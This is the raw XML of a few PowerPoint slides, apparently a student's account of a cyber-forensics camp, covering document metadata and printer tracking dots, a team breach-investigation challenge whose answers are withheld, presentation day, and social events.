              <a:rPr lang="en-GB" sz="6000" kern="0" spc="-5" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DAY 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="6000" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1324136"/>
            <a:ext cx="9025571" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Prof Eric </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" spc="-99" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Filiol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (filiol@esiea.fr)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" kern="0" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>He We have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" kern="0" spc="-5" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Erics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Slides (I wont cover all)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Object 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1523951190"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4800600" y="1407411"/>
          <a:ext cx="4270059" cy="1089025"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1041" name="Packager Shell Object" showAsIcon="1" r:id="rId5" imgW="2021760" imgH="491040" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Packager Shell Object" showAsIcon="1" r:id="rId5" imgW="2021760" imgH="491040" progId="Package">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="10" name="Object 9"/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId6"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="4800600" y="1407411"/>
                        <a:ext cx="4270059" cy="1089025"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="2132174"/>
            <a:ext cx="4800600" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" spc="-99" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Try a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" spc="-99" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>docx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" spc="-99" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as a zip????		Hidden Text (meta still)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" spc="-99" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Printer dots		Printed Date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" spc="-99" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Imprint in paper		Edit Date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" spc="-99" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Draw a circle		All still there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1036" name="Picture 12" descr="Image result for laser printer do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3505200"/>
            <a:ext cx="4226241" cy="316968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laser printer do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7900" y="3505200"/>
            <a:ext cx="4282759" cy="3169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1655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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="116242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0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" kern="0" spc="-5" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DAY 4</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="6000" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1143000"/>
            <a:ext cx="9025571" cy="5570756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Day 4 was challenge day we were given a scenario from a case that needed cracking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A company believed that a data breach had occurred.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Copies of a number of computers had been obtained and a record of the network traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We were to prove whether or not a breach had occurred, who had perpetrated the crime (if one occurred), what, if anything, had been leaked/stolen, how this occurred.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A case report was then to be made with a  presentation on day 5.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>There was a lot in this case. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Stego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, network, hidden tracks, red herrings, encrypted files and data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The teams split the tasks. We built a profile of the users and their activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>I wont give the answers to the challenge as they are on going at other camps around the world.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>All I will say is that it was very interesting, you will never look at the world the same way after one of these camps and you will never feel data safe again.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Tip (when someone says – the password isn’t difficult it just a very long password or a crazy long password – Listen)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13351619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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="116242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0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" kern="0" spc="-5" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DAY 5</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="6000" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1143000"/>
            <a:ext cx="9025571" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Day 5 was presentation and judgment day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We had to present our finding and the case as we saw it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>There were a number of different presentation styles and you may think of a number of groups all making a presentation of the same case over and over would be boring…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>NO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Some made it fun, some were serious and some had a differing take or information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The judges met and it was decided who won, this being who had found the information, how the information was found, and the presentation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We were all then presented will our certificates of participation plus a couple of freebies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Good bye lunch was served and people said their goodbyes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Thank you for listening…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372873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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="116242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0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" spc="-5" dirty="0"/>
              <a:t>DAY 1</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1324136"/>
            <a:ext cx="9025571" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A lot more was shown on the first day and further penetration of system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Michael had a number of technical issues that are believed to be from the virtual images used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We are to acquire a full set of instructions when he has written them with solutions to the technical issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We later were invited to return to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>uni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> in the evening.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We were then taken to a local brewery with free beer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>We were also given our groups for the Thursday challenge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>dutch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> students were classes as forensic experts and so one was allocated to each team and paired with a Salford student as we had no cyber security experience.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Team were between 6-8 strong.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3472228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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
